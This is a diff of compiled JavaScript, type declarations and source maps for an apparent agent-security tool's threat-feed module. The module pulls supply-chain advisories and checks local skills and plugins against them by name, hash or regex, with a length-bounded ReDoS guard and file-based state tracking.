|
152
|
+
* under ReDoS (e.g. `(.+)+`, `(a*)*`, `(a|a)*`)
|
|
153
|
+
* - swallow compile errors silently (treated as "no match")
|
|
154
|
+
*
|
|
155
|
+
* Node's RegExp has no built-in timeout; the cheap-but-effective fix is
|
|
156
|
+
* to bound both the pattern and the body. We accept a slight false-negative
|
|
157
|
+
* rate over freezing on a hostile feed.
|
|
158
|
+
*/
|
|
159
|
+
const MAX_REGEX_LEN = 256;
|
|
160
|
+
const MAX_BODY_BYTES = 256 * 1024;
|
|
161
|
+
const CATASTROPHIC = [
|
|
162
|
+
/\([^)]*[+*]\)[+*]/, // nested quantifier: (x+)+
|
|
163
|
+
/\(([^|()]+\|)+\1\)[+*]/, // alternation duplicate: (a|a)*
|
|
164
|
+
];
|
|
165
|
+
function safeRegexTest(pattern, body) {
|
|
166
|
+
if (typeof pattern !== 'string' || pattern.length === 0)
|
|
167
|
+
return false;
|
|
168
|
+
if (pattern.length > MAX_REGEX_LEN)
|
|
169
|
+
return false;
|
|
170
|
+
for (const danger of CATASTROPHIC) {
|
|
171
|
+
if (danger.test(pattern))
|
|
172
|
+
return false;
|
|
173
|
+
}
|
|
174
|
+
let re;
|
|
175
|
+
try {
|
|
176
|
+
re = new RegExp(pattern);
|
|
177
|
+
}
|
|
178
|
+
catch {
|
|
179
|
+
return false;
|
|
180
|
+
}
|
|
181
|
+
try {
|
|
182
|
+
return re.test(body);
|
|
183
|
+
}
|
|
184
|
+
catch {
|
|
185
|
+
return false;
|
|
186
|
+
}
|
|
187
|
+
}
|
|
188
|
+
/**
|
|
189
|
+
* Simple glob match supporting `*` as a single-segment wildcard. Sufficient
|
|
190
|
+
* for `slack-webhook-*` style advisories without pulling in a glob lib.
|
|
191
|
+
*/
|
|
192
|
+
function globMatch(pattern, value) {
|
|
193
|
+
const re = new RegExp('^' +
|
|
194
|
+
pattern.replace(/[.+^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '[^/]*') +
|
|
195
|
+
'$');
|
|
196
|
+
return re.test(value);
|
|
197
|
+
}
|
|
198
|
+
//# sourceMappingURL=selfcheck.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"selfcheck.js","sourceRoot":"","sources":["../../src/feed/selfcheck.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Local feed-subscription state I/O.
|
|
3
|
+
*
|
|
4
|
+
* Persisted at `~/.agentguard/feed-state.json` so the `subscribe` command
|
|
5
|
+
* doesn't re-process the same advisory across invocations / cron ticks.
|
|
6
|
+
*
|
|
7
|
+
* Kept tiny (single JSON object) on purpose — bigger ledgers go through the
|
|
8
|
+
* audit log path, not here.
|
|
9
|
+
*/
|
|
10
|
+
import type { FeedState } from './types.js';
|
|
11
|
+
export declare function loadFeedState(): FeedState;
|
|
12
|
+
export declare function saveFeedState(state: FeedState): void;
|
|
13
|
+
export declare function markAdvisorySeen(state: FeedState, advisoryId: string): FeedState;
|
|
14
|
+
//# sourceMappingURL=state.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"state.d.ts","sourceRoot":"","sources":["../../src/feed/state.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAKH,OAAO,KAAK,EAAE,SAAS,EAAE,MAAM,YAAY,CAAC;AAQ5C,wBAAgB,aAAa,IAAI,SAAS,CAezC;AAED,wBAAgB,aAAa,CAAC,KAAK,EAAE,SAAS,GAAG,IAAI,CAQpD;AAED,wBAAgB,gBAAgB,CAAC,KAAK,EAAE,SAAS,EAAE,UAAU,EAAE,MAAM,GAAG,SAAS,CAOhF"}
|
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
/**
|
|
3
|
+
* Local feed-subscription state I/O.
|
|
4
|
+
*
|
|
5
|
+
* Persisted at `~/.agentguard/feed-state.json` so the `subscribe` command
|
|
6
|
+
* doesn't re-process the same advisory across invocations / cron ticks.
|
|
7
|
+
*
|
|
8
|
+
* Kept tiny (single JSON object) on purpose — bigger ledgers go through the
|
|
9
|
+
* audit log path, not here.
|
|
10
|
+
*/
|
|
11
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
12
|
+
exports.loadFeedState = loadFeedState;
|
|
13
|
+
exports.saveFeedState = saveFeedState;
|
|
14
|
+
exports.markAdvisorySeen = markAdvisorySeen;
|
|
15
|
+
const node_fs_1 = require("node:fs");
|
|
16
|
+
const node_path_1 = require("node:path");
|
|
17
|
+
const config_js_1 = require("../config.js");
|
|
18
|
+
const SEEN_ID_LIMIT = 1000;
|
|
19
|
+
function statePath() {
|
|
20
|
+
return (0, node_path_1.join)((0, config_js_1.getAgentGuardPaths)().home, 'feed-state.json');
|
|
21
|
+
}
|
|
22
|
+
function loadFeedState() {
|
|
23
|
+
const file = statePath();
|
|
24
|
+
if (!(0, node_fs_1.existsSync)(file))
|
|
25
|
+
return {};
|
|
26
|
+
try {
|
|
27
|
+
const raw = (0, node_fs_1.readFileSync)(file, 'utf8');
|
|
28
|
+
const parsed = JSON.parse(raw);
|
|
29
|
+
return {
|
|
30
|
+
lastPulledAt: parsed.lastPulledAt,
|
|
31
|
+
seenAdvisoryIds: parsed.seenAdvisoryIds ?? [],
|
|
32
|
+
};
|
|
33
|
+
}
|
|
34
|
+
catch {
|
|
35
|
+
// Corrupt state file: pretend it's empty rather than crash. The next
|
|
36
|
+
// successful subscribe will overwrite it.
|
|
37
|
+
return {};
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
function saveFeedState(state) {
|
|
41
|
+
const file = statePath();
|
|
42
|
+
(0, node_fs_1.mkdirSync)((0, node_path_1.dirname)(file), { recursive: true });
|
|
43
|
+
const trimmed = {
|
|
44
|
+
lastPulledAt: state.lastPulledAt,
|
|
45
|
+
seenAdvisoryIds: (state.seenAdvisoryIds ?? []).slice(-SEEN_ID_LIMIT),
|
|
46
|
+
};
|
|
47
|
+
(0, node_fs_1.writeFileSync)(file, `${JSON.stringify(trimmed, null, 2)}\n`, { mode: 0o600 });
|
|
48
|
+
}
|
|
49
|
+
function markAdvisorySeen(state, advisoryId) {
|
|
50
|
+
const set = new Set(state.seenAdvisoryIds ?? []);
|
|
51
|
+
set.add(advisoryId);
|
|
52
|
+
return {
|
|
53
|
+
...state,
|
|
54
|
+
seenAdvisoryIds: [...set],
|
|
55
|
+
};
|
|
56
|
+
}
|
|
57
|
+
//# sourceMappingURL=state.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"state.js","sourceRoot":"","sources":["../../src/feed/state.ts"],"names":[],"mappings":";AAAA;;;;;;;;GAQG;;AAaH,sCAeC;AAED,sCAQC;AAED,4CAOC;AA7CD,qCAA6E;AAC7E,yCAA0C;AAC1C,4CAAkD;AAGlD,MAAM,aAAa,GAAG,IAAI,CAAC;AAE3B,SAAS,SAAS;IAChB,OAAO,IAAA,gBAAI,EAAC,IAAA,8BAAkB,GAAE,CAAC,IAAI,EAAE,iBAAiB,CAAC,CAAC;AAC5D,CAAC;AAED,SAAgB,aAAa;IAC3B,MAAM,IAAI,GAAG,SAAS,EAAE,CAAC;IACzB,IAAI,CAAC,IAAA,oBAAU,EAAC,IAAI,CAAC;QAAE,OAAO,EAAE,CAAC;IACjC,IAAI,CAAC;QACH,MAAM,GAAG,GAAG,IAAA,sBAAY,EAAC,IAAI,EAAE,MAAM,CAAC,CAAC;QACvC,MAAM,MAAM,GAAG,IAAI,CAAC,KAAK,CAAC,GAAG,CAAuB,CAAC;QACrD,OAAO;YACL,YAAY,EAAE,MAAM,CAAC,YAAY;YACjC,eAAe,EAAE,MAAM,CAAC,eAAe,IAAI,EAAE;SAC9C,CAAC;IACJ,CAAC;IAAC,MAAM,CAAC;QACP,qEAAqE;QACrE,0CAA0C;QAC1C,OAAO,EAAE,CAAC;IACZ,CAAC;AACH,CAAC;AAED,SAAgB,aAAa,CAAC,KAAgB;IAC5C,MAAM,IAAI,GAAG,SAAS,EAAE,CAAC;IACzB,IAAA,mBAAS,EAAC,IAAA,mBAAO,EAAC,IAAI,CAAC,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;IAC9C,MAAM,OAAO,GAAc;QACzB,YAAY,EAAE,KAAK,CAAC,YAAY;QAChC,eAAe,EAAE,CAAC,KAAK,CAAC,eAAe,IAAI,EAAE,CAAC,CAAC,KAAK,CAAC,CAAC,aAAa,CAAC;KACrE,CAAC;IACF,IAAA,uBAAa,EAAC,IAAI,EAAE,GAAG,IAAI,CAAC,SAAS,CAAC,OAAO,EAAE,IAAI,EAAE,CAAC,CAAC,IAAI,EAAE,EAAE,IAAI,EAAE,KAAK,EAAE,CAAC,CAAC;AAChF,CAAC;AAED,SAAgB,gBAAgB,CAAC,KAAgB,EAAE,UAAkB;IACnE,MAAM,GAAG,GAAG,IAAI,GAAG,CAAC,KAAK,CAAC,eAAe,IAAI,EAAE,CAAC,CAAC;IACjD,GAAG,CAAC,GAAG,CAAC,UAAU,CAAC,CAAC;IACpB,OAAO;QACL,GAAG,KAAK;QACR,eAAe,EAAE,CAAC,GAAG,GAAG,CAAC;KAC1B,CAAC;AACJ,CAAC"}
|
|
@@ -0,0 +1,102 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Threat-feed advisory types.
|
|
3
|
+
*
|
|
4
|
+
* AgentGuard Cloud publishes `Advisory` objects describing newly discovered
|
|
5
|
+
* supply-chain threats (malicious skills, rugged MCP servers, prompt-injection
|
|
6
|
+
* patterns in popular plugins). Subscribing local guards pull the feed,
|
|
7
|
+
* run a targeted self-check, and report back which local artifacts matched.
|
|
8
|
+
*
|
|
9
|
+
* Schema intentionally mirrors the OSV.dev advisory shape (signed JSON over
|
|
10
|
+
* HTTPS, `affected[]` array of identifier matchers) so the feed can later be
|
|
11
|
+
* federated with OSV and OSS Insight.
|
|
12
|
+
*/
|
|
13
|
+
/** Supply-chain ecosystem an advisory targets. */
|
|
14
|
+
export type AdvisoryEcosystem = 'skill' | 'plugin' | 'mcp_server';
|
|
15
|
+
export type AdvisorySeverity = 'low' | 'medium' | 'high' | 'critical';
|
|
16
|
+
/**
|
|
17
|
+
* One matcher inside `Advisory.affected[]`. A local artifact matches the
|
|
18
|
+
* advisory if ANY matcher matches. A matcher matches if ALL of its fields
|
|
19
|
+
* that are set match the artifact (so name + hash narrows the match).
|
|
20
|
+
*/
|
|
21
|
+
export interface AdvisoryAffected {
|
|
22
|
+
/**
|
|
23
|
+
* Glob-ish name pattern matched against the skill's `name` field or the
|
|
24
|
+
* containing directory name. Supports `*` as a single-segment wildcard.
|
|
25
|
+
* Example: `slack-webhook-*`.
|
|
26
|
+
*/
|
|
27
|
+
namePattern?: string;
|
|
28
|
+
/**
|
|
29
|
+
* Specific SHA-256 hash (hex, lowercase) of the artifact's content
|
|
30
|
+
* (a directory hash for skill dirs, file hash for single-file artifacts).
|
|
31
|
+
* Exact match.
|
|
32
|
+
*/
|
|
33
|
+
sha256?: string;
|
|
34
|
+
/**
|
|
35
|
+
* Optional semver range. Reserved for future use — current matchers
|
|
36
|
+
* ignore version unless explicitly set. Tools should treat unknown ranges
|
|
37
|
+
* as "match any version" rather than fail closed.
|
|
38
|
+
*/
|
|
39
|
+
versionRange?: string;
|
|
40
|
+
/**
|
|
41
|
+
* Optional regex applied to the textual body of `SKILL.md` (or the file
|
|
42
|
+
* contents for non-skill artifacts). Use this when the threat manifests as
|
|
43
|
+
* a code/text pattern rather than a known hash.
|
|
44
|
+
*/
|
|
45
|
+
bodyRegex?: string;
|
|
46
|
+
}
|
|
47
|
+
export interface Advisory {
|
|
48
|
+
/** Stable identifier, e.g. `AGS-2026-0042`. */
|
|
49
|
+
id: string;
|
|
50
|
+
ecosystem: AdvisoryEcosystem;
|
|
51
|
+
severity: AdvisorySeverity;
|
|
52
|
+
/** Short headline. <= 120 chars. */
|
|
53
|
+
summary: string;
|
|
54
|
+
/** Long-form markdown body. May include remediation steps. */
|
|
55
|
+
detailsMd: string;
|
|
56
|
+
/** Matchers — local artifact matches the advisory if ANY entry matches. */
|
|
57
|
+
affected: AdvisoryAffected[];
|
|
58
|
+
/** ISO-8601 timestamp when published. */
|
|
59
|
+
publishedAt: string;
|
|
60
|
+
/** Optional withdrawal timestamp — if set, the advisory was retracted. */
|
|
61
|
+
withdrawnAt?: string | null;
|
|
62
|
+
/**
|
|
63
|
+
* Optional HMAC-SHA256 hex signature of the canonical JSON payload, signed
|
|
64
|
+
* with the cloud's per-publisher key. Subscribers can verify integrity if
|
|
65
|
+
* they have the verifier key. Empty when the cloud doesn't sign yet.
|
|
66
|
+
*/
|
|
67
|
+
signature?: string;
|
|
68
|
+
/** External references — Snyk, NVD, GHSA, blog posts. */
|
|
69
|
+
references?: string[];
|
|
70
|
+
}
|
|
71
|
+
/**
|
|
72
|
+
* Local feed-subscription state. Persisted between `subscribe` runs so the
|
|
73
|
+
* client doesn't re-process advisories it has already seen.
|
|
74
|
+
*/
|
|
75
|
+
export interface FeedState {
|
|
76
|
+
/** ISO-8601 timestamp of the latest advisory `publishedAt` we've processed. */
|
|
77
|
+
lastPulledAt?: string;
|
|
78
|
+
/** Stable IDs of advisories already evaluated; bounded LRU. */
|
|
79
|
+
seenAdvisoryIds?: string[];
|
|
80
|
+
}
|
|
81
|
+
/**
|
|
82
|
+
* Result of running a single advisory's checks against the local environment.
|
|
83
|
+
*/
|
|
84
|
+
export interface SelfCheckResult {
|
|
85
|
+
advisoryId: string;
|
|
86
|
+
/** Always populated, even when empty (means "we checked, nothing matched"). */
|
|
87
|
+
matchedArtifacts: SelfCheckMatch[];
|
|
88
|
+
/** Wall-clock duration in milliseconds. */
|
|
89
|
+
elapsedMs: number;
|
|
90
|
+
/** Errors per-matcher that prevented a definitive answer. Non-fatal. */
|
|
91
|
+
warnings: string[];
|
|
92
|
+
}
|
|
93
|
+
export interface SelfCheckMatch {
|
|
94
|
+
/** Local path to the matched artifact (skill dir / file). Redaction is the
|
|
95
|
+
* caller's responsibility before reporting upstream. */
|
|
96
|
+
path: string;
|
|
97
|
+
/** Which matcher hit. Useful for explaining "why" to the user. */
|
|
98
|
+
matchedBy: 'namePattern' | 'sha256' | 'bodyRegex';
|
|
99
|
+
/** When matched by hash, this is the local hash that equalled the advisory's. */
|
|
100
|
+
hash?: string;
|
|
101
|
+
}
|
|
102
|
+
//# sourceMappingURL=types.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../../src/feed/types.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAEH,kDAAkD;AAClD,MAAM,MAAM,iBAAiB,GAAG,OAAO,GAAG,QAAQ,GAAG,YAAY,CAAC;AAElE,MAAM,MAAM,gBAAgB,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;AAEtE;;;;GAIG;AACH,MAAM,WAAW,gBAAgB;IAC/B;;;;OAIG;IACH,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB;;;;OAIG;IACH,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB;;;;OAIG;IACH,YAAY,CAAC,EAAE,MAAM,CAAC;IACtB;;;;OAIG;IACH,SAAS,CAAC,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,QAAQ;IACvB,+CAA+C;IAC/C,EAAE,EAAE,MAAM,CAAC;IACX,SAAS,EAAE,iBAAiB,CAAC;IAC7B,QAAQ,EAAE,gBAAgB,CAAC;IAC3B,oCAAoC;IACpC,OAAO,EAAE,MAAM,CAAC;IAChB,8DAA8D;IAC9D,SAAS,EAAE,MAAM,CAAC;IAClB,2EAA2E;IAC3E,QAAQ,EAAE,gBAAgB,EAAE,CAAC;IAC7B,yCAAyC;IACzC,WAAW,EAAE,MAAM,CAAC;IACpB,0EAA0E;IAC1E,WAAW,CAAC,EAAE,MAAM,GAAG,IAAI,CAAC;IAC5B;;;;OAIG;IACH,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,yDAAyD;IACzD,UAAU,CAAC,EAAE,MAAM,EAAE,CAAC;CACvB;AAED;;;GAGG;AACH,MAAM,WAAW,SAAS;IACxB,+EAA+E;IAC/E,YAAY,CAAC,EAAE,MAAM,CAAC;IACtB,+DAA+D;IAC/D,eAAe,CAAC,EAAE,MAAM,EAAE,CAAC;CAC5B;AAED;;GAEG;AACH,MAAM,WAAW,eAAe;IAC9B,UAAU,EAAE,MAAM,CAAC;IACnB,+EAA+E;IAC/E,gBAAgB,EAAE,cAAc,EAAE,CAAC;IACnC,2CAA2C;IAC3C,SAAS,EAAE,MAAM,CAAC;IAClB,wEAAwE;IACxE,QAAQ,EAAE,MAAM,EAAE,CAAC;CACpB;AAED,MAAM,WAAW,cAAc;IAC7B;6DACyD;IACzD,IAAI,EAAE,MAAM,CAAC;IACb,kEAAkE;IAClE,SAAS,EAAE,aAAa,GAAG,QAAQ,GAAG,WAAW,CAAC;IAClD,iFAAiF;IACjF,IAAI,CAAC,EAAE,MAAM,CAAC;CACf"}
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
/**
|
|
3
|
+
* Threat-feed advisory types.
|
|
4
|
+
*
|
|
5
|
+
* AgentGuard Cloud publishes `Advisory` objects describing newly discovered
|
|
6
|
+
* supply-chain threats (malicious skills, rugged MCP servers, prompt-injection
|
|
7
|
+
* patterns in popular plugins). Subscribing local guards pull the feed,
|
|
8
|
+
* run a targeted self-check, and report back which local artifacts matched.
|
|
9
|
+
*
|
|
10
|
+
* Schema intentionally mirrors the OSV.dev advisory shape (signed JSON over
|
|
11
|
+
* HTTPS, `affected[]` array of identifier matchers) so the feed can later be
|
|
12
|
+
* federated with OSV and OSS Insight.
|
|
13
|
+
*/
|
|
14
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
15
|
+
//# sourceMappingURL=types.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"types.js","sourceRoot":"","sources":["../../src/feed/types.ts"],"names":[],"mappings":";AAAA;;;;;;;;;;;GAWG"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-cloud.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,93 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const node_http_1 = require("node:http");
|
|
9
|
+
const client_js_1 = require("../cloud/client.js");
|
|
10
|
+
function startServer(handler) {
|
|
11
|
+
return new Promise((resolve) => {
|
|
12
|
+
const server = (0, node_http_1.createServer)(handler);
|
|
13
|
+
server.listen(0, '127.0.0.1', () => {
|
|
14
|
+
const { port } = server.address();
|
|
15
|
+
resolve({ url: `http://127.0.0.1:${port}`, server });
|
|
16
|
+
});
|
|
17
|
+
});
|
|
18
|
+
}
|
|
19
|
+
(0, node_test_1.describe)('cloud client — feed methods', () => {
|
|
20
|
+
let baseUrl;
|
|
21
|
+
let server;
|
|
22
|
+
let lastRequest = null;
|
|
23
|
+
let nextResponse = { status: 200, body: {} };
|
|
24
|
+
(0, node_test_1.before)(async () => {
|
|
25
|
+
const started = await startServer(async (req, res) => {
|
|
26
|
+
const chunks = [];
|
|
27
|
+
for await (const chunk of req)
|
|
28
|
+
chunks.push(chunk);
|
|
29
|
+
const raw = Buffer.concat(chunks).toString('utf8');
|
|
30
|
+
